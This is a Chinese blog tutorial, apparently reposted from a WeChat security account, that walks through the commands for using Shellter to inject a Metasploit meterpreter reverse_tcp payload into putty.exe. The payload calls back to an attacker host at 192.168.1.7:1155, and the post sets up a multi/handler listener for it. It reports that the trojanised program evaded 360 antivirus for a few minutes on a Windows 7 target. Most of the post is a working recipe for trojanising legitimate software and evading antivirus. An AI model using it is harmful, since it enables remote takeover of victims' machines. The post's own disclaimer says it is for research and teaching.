攻击 |
kali |
192.168.1.7 |
靶机 |
win7 |
/ |
一、运行shellter工具
①下载shellter:
apt-get install shellter
②安装Windows运行环境(等待时间稍长)
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
③运行shellter
choose operation mode - auto/manual: a #自动模式
pe target>/root/putty.exe #选择要注入的文件程序
enable stealth mode?>y #健康模式
use a listed payload or custom>l #选择列表
set payload by index>1 #调用meterpreter_reverse_TCP模块
set lhost:192.168.1.7
set lport:1155
④ 捆绑完成
此时已经完成捆绑,putty.exe已经被注入msf payload:
二、攻击
①msf建立监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost:192.168.1.7
set lport:1155
run
②建立会话
将putty.exe放进装有360杀毒的win7中,并运行。
③ 会话建立成功,成功免杀360
但是会话大概在三分钟左右(甚至更短)会被360kill。同理,免费的没有收费的香,据说收费的强大的不行。
历史文章推荐:
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,麻烦各位师傅文章底部给点个“再看”,感激不尽
原文始发于微信公众号(橘猫学安全):MSF配合shellter实现360免杀
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论